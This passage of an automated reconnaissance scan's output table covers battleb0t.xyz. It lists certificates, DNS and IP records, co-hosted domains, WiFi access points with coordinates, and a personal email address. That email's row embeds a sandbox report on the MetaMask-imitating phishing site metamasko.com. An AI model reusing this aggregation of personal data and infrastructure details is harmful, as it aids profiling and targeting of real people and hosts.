"public_key": {"key_algorithm": "RSA", "rsa": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 256, "modulus": "0TpnPayT/qE4F6J4qzOiK7JhnrAo9bFLNo2svrHA/v0LaIOAybJrnc5AyyYwgS6PTnc5WMsgwlVeIH5TInjmeEsEinXaSlGOrsV7Gm/ZW+7PMzYrK4KMP7g5Pv95Q5JU7FTQvxHAzRGxkvPDzcyogoNJIk1KXgVLPxdUyd+B1UFVrTMrqAkIf0M1HRzdWlOHv+OEsQ2QjcnXP0mIdDF6sbDns9klIt09P59g0zL++OZSIkvbIRKyvkKcmp+73HQRF0pjn2SY2RJKMExBzgIlPDKzcHLqDMPRl2zP8TcIdzRjF/X4rRYa64yxqmMYIDs4WPnhkpo7c5uTK7f4TFIU1Q==", 
"exponent": "AAEAAQ=="}, "fingerprint": "e577b60ecc733cd981273f877b2ab03d93986490630d699801165ebbec0a48cf"}, "subject_dn": "CN=*.cloudwaysapps.com", "pubkey_bit_size": 2048, "fingerprint": "46c14572bed6bb1c8797e7a0292d295e561d717b22535af514608f0d2fe40802", "issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "names": ["*.cloudwaysapps.com", "cloudwaysapps.com"], "tbs_fingerprint": "f9537ad843dfc5f6c9ec168dd4c17c3b |
| 2023-05-12 03:08:36 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 185.199.110.154 | 185.199.110.153 |
| 2023-05-12 02:45:35 | Internet Name | No | DNSDumpster | 2 | 0 | 1 | 0 | None | vscode.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:FD:45:09) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 01a637 (Net ID: 00:02:2D:01:A6:37) | 37.7642, -122.3993 |
| 2023-05-12 03:01:04 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.112): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Livejournal (Category: blog)
https://login.livejournal.com | login |
| 2023-05-12 03:00:00 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | banksean@gmail.com | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://c.timestamp/1e3),a.data.set(ce,c.qa)));a.get(je)&&(c=a.get(se),d', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://math.pi/e,n=this.or.v,i=this.os.v,a=2*math.pi*n/(4*e),o=.5*-math.pi,s=3===this.data.d', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://metamasko.com/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_b7c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_b7c_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_b7c_IE_EarlyTabStart_0xea4_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2940"\n "IsoScope_b7c_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_b7c_ConnHashTable<2940>_HashTable_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_b7c_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', 
u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"154.82.100.186:80"\n "154.82.100.186:443"\n "172.217.12.106:443"\n "47.253.50.2:443"\n "142.250.191.42:443"\n "142.251.214.131:443"\n "43.251.41.15:443"\n "104.17.210.243:443"\n "142.250.191.67:443"\n "103.143.19.103:443"\n "104.17.213.243:443"\n "43.251.41.5:443"\n "208.89.12.90:443"\n "185.199.109.153:443"\n "208.89.12.87:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"metamasko.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"accdn.lpsnmedia.net"\n "ajax.googleapis.com"\n "collect-v6.51.la"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "forms.hsforms.com"\n "lpcdn.lpsnmedia.net"\n "lptag.liveperson.net"\n "metamask.io"\n "metamasko.com"\n "perf.hsforms.com"\n "sdk.51.la"\n "va.v.liveperson.net"\n "www.gstatic.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "dir "; File: "js_2_.js")\n Found string "<meta 
content="MetaMask - A crypto wallet & gateway to blockchain apps" property="twitter:title">" (Indicator: "dir "; File: "urlref_httpmetamasko.com")\n Found string "<meta content="A crypto wallet & gateway to blockchain apps" property="twitter:description">" (Indicator: "dir "; File: "urlref_httpmetamasko.com")\n Found string "<meta content="https://uploads-ssl.webflow.com/5b479ea1731aa13135a70342/5e6010110671f79d5c96adf9_open%20graph.png" property="twitter:image">" (Indicator: "dir "; File: "urlref_httpmetamasko.com")\n Found string "<meta content="summary_large_image" name="twitter:card">" (Indicator: "dir "; File: "urlref_httpmetamasko.com")\n Found string "<div style="padding-top:56.17021276595745%" class="video w-video w-embed"><iframe class="embedly-embed" src="widgets/media.html" scrolling="no" title="YouTube embed" frameborder="0" allow="autoplay; fullscreen" allowfullscreen="true"></iframe></div>" (Indicator: "dir "; File: "urlref_httpmetamasko.com")\n Found string "<a href="javascript:;" rel="noreferer\n noopener" target="_blank" class="footer-link">Twitter</a>" (Indicator: "dir "; File: "urlref_httpmetamasko.com")\n Found string ".w-widget-twitter {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim * {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim .w-widget-twitter-count-inner {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim .w-widget-twitter-count-clear {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--large {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--large .w-widget-twitter-count-inner {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical) {" (Indicator: "dir "; File: "webflow_1_.css")\n 
Found string ".w-widget-twitter-count-shim:not(.w--vertical).w--large {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical):before," (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical):after {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical):before {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical).w--large:before {" (Indicator: "dir "; File: "webflow_1_.css")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "Explore-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "wallet-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "Browse-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "urlref_httpmetamasko.com" as clean (type is "HTML document UTF-8 Unicode text with very long lines")\n Antivirus vendors marked dropped file "mm-logo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarF342.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarF3C1.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', 
u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"hero2.2_1_.png" has type "PNG image data 1752 x 1452 8-bit/color RGBA non-interlaced" and extension "png"\n "mm-shop-hoodie_1_.png" has type "PNG image data 786 x 786 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-axieinfinity_1_.png" has type "PNG image data 560 x 560 8-bit/color RGBA non-interlaced" and extension "png"\n "payload_1_.jpg" has type "JPEG image data JFIF standard 1.02 aspect ratio density 1x1 segment length 16 baseline precision 8 450x450 components 3" and extension "jpg"\n "dapp-aave_1_.png" has type "PNG image data 560 x 560 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-compound_1_.png" has type "PNG image data 280 x 280 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-uniswap_1_.png" has type "PNG image data 280 x 280 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-gitcoin_1_.png" has type "PNG image data 280 x 280 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-maker_1_.png" has type "Unknown" and extension "png"\n "dapp-rarible_1_.png" has type "Unknown" and extension "png"\n "dapp-opensea_1_.png" has type "Unknown" and extension "png"\n "info_2x_1_.png" has type "Unknown" and extension "png"\n "refresh_2x_1_.png" has type "Unknown" and extension "png"\n "image_2x_1_.png" has type "Unknown" and extension "png"\n "undo_2x_1_.png" has type "Unknown" and extension "png"\n "audio_2x_1_.png" has type "Unknown" and extension "png"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 
63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003916]\n "CabF331.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BBHWIRELESS (Net ID: 00:00:C5:D7:66:BC) | 41.8781, -87.6298 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Tenor (Category: images)
https://tenor.com/users/login | login |
| 2023-05-12 02:44:41 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 74.170.74.34.bc.googleusercontent.com | 34.74.170.74 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cross-origin-embedder-policy: require-corp | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=6ZH4%2BS7iwGiB1Wu7l%2FAB03y2sKXJwRGFC2pyd%2BZjS4ZmLlnY7XMvuoX5GBTxa3DM3NheNEVhPebnH7oSWouKWRGMXi2e4r7tA5Bf491iZPTiDiZco8VmKugKJA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5a3bb81a1b-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:55:11 | Raw Data from RIRs | No | Censys | 0 | 0 | 2 | 0 | None | {"operating_system": {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, "last_updated_at": "2023-05-12T02:24:16.353Z", "ip": "87.248.157.102", "labels": ["email", "remote-access", "database", "file-sharing"], "location_updated_at": "2023-05-03T17:32:15.874229Z", "autonomous_system_updated_at": "2023-05-03T17:32:15.874604Z", "location": {"province": "Bursa Province", "city": "Bursa", "country": "Turkey", "coordinates": {"latitude": 40.19559, "longitude": 29.06013}, "postal_code": "16250", "country_code": "TR", "timezone": "Europe/Istanbul", "continent": "Asia"}, "dns": {"records": {"cpanel.ozansezgin.com.tr": {"record_type": "A", "resolved_at": "2023-01-05T17:17:36.160101130Z"}, "www.discord.stargamepin.com": {"record_type": "A", "resolved_at": "2022-10-04T14:04:52.760179166Z"}, "webdisk.canakkalekombitamircisi.com": {"record_type": "A", "resolved_at": "2023-05-02T14:33:42.879167Z"}, "www.berateren.com.tr": {"record_type": "CNAME", "resolved_at": "2023-01-08T16:41:42.225534467Z"}, "cpanel.craftregion.net": {"record_type": "A", "resolved_at": "2022-12-28T16:14:35.726676809Z"}, "file.ahmetemn.xyz": {"record_type": "A", "resolved_at": "2022-12-28T17:39:26.229223807Z"}, "emperialnetwork.com.tr": {"record_type": "A", "resolved_at": "2022-12-19T16:59:46.464337451Z"}, "www.dostbultanis.xyz": {"record_type": "CNAME", "resolved_at": "2022-11-05T18:06:42.153390405Z"}, "www.muratcanozturkk.xyz": {"record_type": "CNAME", "resolved_at": "2022-10-04T17:07:38.536349504Z"}, "cpcalendars.fastcup.gq": {"record_type": "A", "resolved_at": "2022-10-14T15:00:12.399066755Z"}, "zehirmedya.com": {"record_type": "A", "resolved_at": "2023-02-27T15:20:55.500762915Z"}, "cpcalendars.mcevim.com": {"record_type": "A", "resolved_at": "2023-01-25T13:44:53.784463939Z"}, "www.serpilbolatcan.com": {"record_type": "CNAME", "resolved_at": 
"2022-11-03T13:53:32.177886238Z"}, "webmail.tahakaya.tk": {"record_type": "A", "resolved_at": "2022-10-03T21:41:44.056705877Z"}, "mestbungalov.xyz": {"record_type": "A", "resolved_at": "2022-11-02T09:30:48.965680163Z"}, "www.tahakaya.tk": {"record_type": "CNAME", "resolved_at": "2022-10-24T16:44:34.447999702Z"}, "www.preview.ahmetemn.xyz": {"record_type": "A", "resolved_at": "2022-12-22T16:54:29.866591925Z"}, "www.undsel.org": {"record_type": "CNAME", "resolved_at": "2023-02-08T19:45:18.794414750Z"}, "www.mcevim.com": {"record_type": "CNAME", "resolved_at": "2023-01-25T13:44:54.141586649Z"}, "mail.tahakaya.tk": {"record_type": "CNAME", "resolved_at": "2022-10-30T17:45:49.047255176Z"}, "www.klausfx.com": {"record_type": "CNAME", "resolved_at": "2022-10-05T13:42:56.873133625Z"}, "cpanel.canakkalekombitamircisi.com": {"record_type": "A", "resolved_at": "2023-05-10T14:06:47.408478527Z"}, "xfcheats.tk": {"record_type": "A", "resolved_at": "2022-10-03T17:50:42.316963800Z"}, "www.fastcup.gq": {"record_type": "CNAME", "resolved_at": "2022-10-13T15:20:37.540317287Z"}, "benimbungalovum.com": {"record_type": "A", "resolved_at": "2022-11-02T14:17:47.483900217Z"}, "_dc-mx.e5e37e515239.sc-riber.games": {"record_type": "A", "resolved_at": "2023-05-07T17:27:28.131252899Z"}, "ochook.gq": {"record_type": "A", "resolved_at": "2023-03-08T16:13:39.337482400Z"}, "cpcontacts.xfcheats.tk": {"record_type": "A", "resolved_at": "2022-10-19T17:13:40.119876482Z"}, "webdisk.tahakaya.tk": {"record_type": "A", "resolved_at": "2022-10-30T17:45:49.630983754Z"}, "www.sourcecode.xeticias.xyz": {"record_type": "A", "resolved_at": "2022-10-04T17:08:41.037846092Z"}, "webdisk.burakatli.tk": {"record_type": "A", "resolved_at": "2022-12-06T18:01:14.023227309Z"}, "mail.dostbultanis.xyz": {"record_type": "CNAME", "resolved_at": "2022-11-10T16:55:45.621219874Z"}, "webmail.skymine.pw": {"record_type": "A", "resolved_at": "2022-11-16T16:52:03.463771179Z"}, "discord.stargamepin.com": {"record_type": "A", 
"resolved_at": "2022-10-11T14:18:39.106831985Z"}, "cpanel.pimapencanakkale.com": {"record_type": "A", "resolved_at": "2023-04-23T15:46:39.115203086Z"}, "webdisk.pimapencanakkale.com": {"record_type": "A", "resolved_at": "2023-05-02T22:30:28.895880752Z"}, "furkanulgen.dev": {"record_type": "A", "resolved_at": "2023-02-05T14:53:26.346732767Z"}, "cpcontacts.altf13.com": {"record_type": "A", "resolved_at": "2023-01-31T12:46:00.853214402Z"}, "bayholmen.tk": {"record_type": "A", "resolved_at": "2022-10-03T17:49:42.087742760Z"}, "cpcontacts.fastcup.gq": {"record_type": "A", "resolved_at": "2022-10-20T14:59:42.612109055Z"}, "ikisekizbungalov.com": {"record_type": "A", "resolved_at": "2022-11-03T11:07:18.159230616Z"}, "mail.fealhost.com": {"record_type": "CNAME", "resolved_at": "2023-04-06T04:11:51.805186315Z"}, "whm.discord.stargamepin.com": {"record_type": "A", "resolved_at": "2022-10-04T14:04:52.276649345Z"}, "darkwolf.network": {"record_type": "A", "resolved_at": "2023-03-21T03:44:01.438444589Z"}, "www.karacolticaret.pw": {"record_type": "CNAME", "resolved_at": "2023-01-27T17:21:17.709086375Z"}, "mail.bwkcn.codes": {"record_type": "CNAME", "resolved_at": "2022-10-23T12:43:26.611424497Z"}, "yaraticikupler.fun": {"record_type": "A", "resolved_at": "2023-01-14T22:49:21.772913425Z"}, "cpcalendars.tahakaya.tk": {"record_type": "A", "resolved_at": "2022-10-14T17:19:23.144240561Z"}, "webdisk.metamimarlik.com": {"record_type": "A", "resolved_at": "2022-11-03T13:29:46.589630465Z"}, "panel.sourcepawn.com": {"record_type": "A", "resolved_at": "2022-12-09T14:04:16.033214357Z"}, "www.ryzemc.com.serpilbolatcan.com": {"record_type": "A", "resolved_at": "2022-11-15T13:52:29.199227401Z"}, "webdisk.fastcup.gq": {"record_type": "A", "resolved_at": "2022-10-05T15:07:37.703008867Z"}, "altf13.com": {"record_type": "A", "resolved_at": "2023-02-02T12:39:42.545911226Z"}, "mail.xfcheats.tk": {"record_type": "CNAME", "resolved_at": "2022-10-04T16:56:53.515031714Z"}, "www.shop.itanpia.org": 
{"record_type": "A", "resolved_at": "2022-12-21T17:17:06.217809961Z"}, "cpcontacts.canakkalekombitamircisi.com": {"record_type": "A", "resolved_at": "2023-04-29T14:19:50.400682526Z"}, "meneksebungalov.com": {"record_type": "A", "resolved_at": "2022-11-08T13:42:29.160787558Z"}, "dc.ahmetemn.xyz": {"record_type": "A", "resolved_at": "2022-12-20T16:55:19.902730683Z"}, "tahakaya.tk": {"record_type": "A", "resolved_at": "2022-10-12T17:18:46.107319847Z"}, "tiktok.stargamepin.com": {"record_type": "A", "resolved_at": "2022-10-05T14:19:22.052159604Z"}, "www.test.bilgietkisi.com": {"record_type": "A", "resolved_at": "2023-03-18T13:54:35.365876978Z"}, "shop.itanpia.org": {"record_type": "A", "resolved_at": "2023-01-14T08:39:09.594223328Z"}, "webdisk.kemsuca.com": {"record_type": "A", "resolved_at": "2022-10-04T13:31:14.803922215Z"}, "cpcalendars.muratcanozturkk.xyz": {"record_type": "A", "resolved_at": "2022-10-04T17:07:36.743450291Z"}, "www.enesk.xyz": {"record_type": "CNAME", "resolved_at": "2023-01-27T17:57:21.368850900Z"}, "www.twitch.stargamepin.com": {"record_type": "A", "resolved_at": "2022-10-05T14:19:22.374732364Z"}, "www.gameguard.ochook.tk": {"record_type": "A", "resolved_at": "2023-03-11T19:38:51.584036132Z"}, "berateren.com.tr": {"record_type": "A", "resolved_at": "2023-01-14T17:18:47.330887795Z"}, "webdisk.mcevim.com": {"record_type": "A", "resolved_at": "2023-01-19T13:23:09.181757813Z"}, "ormanevleribungalov.com": {"record_type": "A", "resolved_at": "2022-12-08T13:46:22.391341104Z"}, "skyboxtr.com": {"record_type": "A", "resolved_at": "2023-02-28T14:56:51.452831255Z"}, "www.mental.xeticias.xyz": {"record_type": "A", "resolved_at": "2022-11-28T17:27:53.459024802Z"}, "www.mestbungalov.com": {"record_type": "CNAME", "resolved_at": "2022-10-31T13:52:56.890144647Z"}, "www.dev.ahmetemn.xyz": {"record_type": "A", "resolved_at": "2022-12-29T16:58:51.266944718Z"}, "cpcalendars.serpilbolatcan.com": {"record_type": "A", "resolved_at": "2022-10-25T14:05:20.558939618Z"}, 
"www.exeteam.net": {"record_type": "CNAME", "resolved_at": "2023-04-27T20:57:35.047087859Z"}, "altinbungalov.com": {"record_type": "A", "resolved_at": "2022-10-14T12:46:13.873525996Z"}, "mail.canakkaleuyduantenci.com": {"record_type": "CNAME", "resolved_at": "2023-04-15T14:05:51.043804823Z"}, "explation.xyz": {"record_type": "A", "resolved_at": "2022-11-03T20:22:32.508653902Z"}, "muratcanozturkk.xyz": {"record_type": "A", "resolved_at": "2022-10-04T17:07:35.839337873Z"}, "cpanel.itanpia.org": {"record_type": "A", "resolved_at": "2022-12-19T16:39:16.921255240Z"}, "eventkil.com": {"record_type": "A", "resolved_at": "2023-05-04T14:44:33.809431992Z"}, "www.metamimarlik.com": {"record_type": "CNAME", "resolved_at": "2022-11-22T13:53:03.897632462Z"}, "sapancabungalovotel.com": {"record_type": "A", "resolved_at": "2022-10-21T13:45:32.989372866Z"}, "xn--kemaldnmez-jcb.com": {"record_type": "A", "resolved_at": "2023-02-12T14:33:55.830955863Z"}, "sourcepawn.com": {"record_type": "A", "resolved_at": "2022-11-27T13:51:33.375397529Z"}, "cpanel.tahakaya.tk": {"record_type": "A", "resolved_at": "2022-10-25T17:24:32.346509475Z"}, "cpcalendars.canakkalekombitamircisi.com": {"record_type": "A", "resolved_at": "2023-05-01T14:00:27.620190431Z"}, "cpcontacts.tahakaya.tk": {"record_type": "A", "resolved_at": "2022-11-03T16:33:54.752105702Z"}, "cpanel.metamimarlik.com": {"record_type": "A", "resolved_at": "2022-11-11T13:28:40.298899238Z"}, "webdisk.altf13.com": {"record_type": "A", "resolved_at": "2023-01-30T12:43:04.754213362Z"}, "cpanel.rallirp.com": {"record_type": "A", "resolved_at": "2023-02-24T14:29:25.642654288Z"}, "cpcalendars.skymine.pw": {"record_type": "A", "resolved_at": "2022-11-03T16:23:02.786010839Z"}, "exeteam.net": {"record_type": "A", "resolved_at": "2023-05-07T19:37:55.421427404Z"}, "whm.tahakaya.tk": {"record_type": "A", "resolved_at": "2022-11-03T16:33:56.304949095Z"}, "www.iletisim.stargamepin.com": {"record_type": "A", "resolved_at": 
"2022-10-03T14:20:38.744192612Z"}, "webmail.mcevim.com": {"record_type": "A", "resolved_at": "2023-01-19T13:23:09.500084525Z"}, "canakkalekombitamircisi.com": {"record_type": "A", "resolved_at": "2023-05-08T14:25:32.527389858Z"}, "kemsuca.com": {"record_type": "A", "resolved_at": "2022-10-05T13:42:30.471263227Z"}, "cpcontacts.pimapencanakkale.com": {"record_type": "A", " | 87.248.157.102 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | WaveLAN Network (Net ID: 00:02:2D:67:07:75) | 34.0544, -118.244 |
| 2023-05-12 03:23:09 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.0:443 | 188.114.96.0/24 |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/carti_1.jpg | https://pics.battleb0t.xyz/ |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=edDiEwhb09qQfIsTtwWW7UDu1MTL3Si52Y7U9Wl3lDs5gxZDQPT8RjqeUYH5RKj%2BznpLhqhxC7IhGlKBCbb1RcMkuvy%2BQXyCAqu56mfTiAPJY0zM85v%2FwjqSATHbVC1%2FaGucnEby\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html; charset=utf-8", "cf-ray": "7c5f6059be52c402-EWR"} |
| 2023-05-12 02:53:15 | IPv6 Address | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | 2606:4700:3030::ac43:a8fc | battleb0t.xyz |
| 2023-05-12 03:36:57 | Malicious IP Address | Yes | MetaDefender | 0 | 0 | 2 | 0 | None | webroot.com [87.248.157.102] | 87.248.157.102 |
| 2023-05-12 02:53:45 | Raw Data from RIRs | No | Censys | 0 | 0 | 2 | 0 | None | {"last_updated_at": "2023-05-12T01:39:10.944Z", "ip": "2606:50c0:8002::153", "location_updated_at": "2023-05-08T10:38:44.903871Z", "autonomous_system_updated_at": "2023-05-08T10:38:44.903996Z", "location": {"province": "California", "city": "San Francisco", "country": "United States", "coordinates": {"latitude": 37.7621, "longitude": -122.3971}, "postal_code": "94107", "country_code": "US", "timezone": "America/Los_Angeles", "continent": "North America"}, "dns": {"records": {"www.pixeli.dev": {"record_type": "CNAME", "resolved_at": "2023-03-13T23:50:00.966261596Z"}, "www.willbishop.dev": {"record_type": "CNAME", "resolved_at": "2023-03-06T20:23:13.520153960Z"}, "www.spncr.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T19:22:10.270076260Z"}, "www.rohanseth.dev": {"record_type": "CNAME", "resolved_at": "2023-02-22T00:00:27.264834898Z"}, "statereps.cicerodata.com": {"record_type": "CNAME", "resolved_at": "2023-03-16T13:20:14.306282261Z"}, "www.asiavalentine.dev": {"record_type": "CNAME", "resolved_at": "2023-03-05T15:52:15.471978167Z"}, "catclicker.zaklaughton.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T17:42:34.665120760Z"}, "www.omkardhande.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T07:55:27.721595395Z"}, "www.montferret.dev": {"record_type": "CNAME", "resolved_at": "2023-03-20T01:17:26.803641174Z"}, "www.guziyf.com": {"record_type": "CNAME", "resolved_at": "2023-01-15T05:57:21.072132005Z"}, "myreads.zaklaughton.dev": {"record_type": 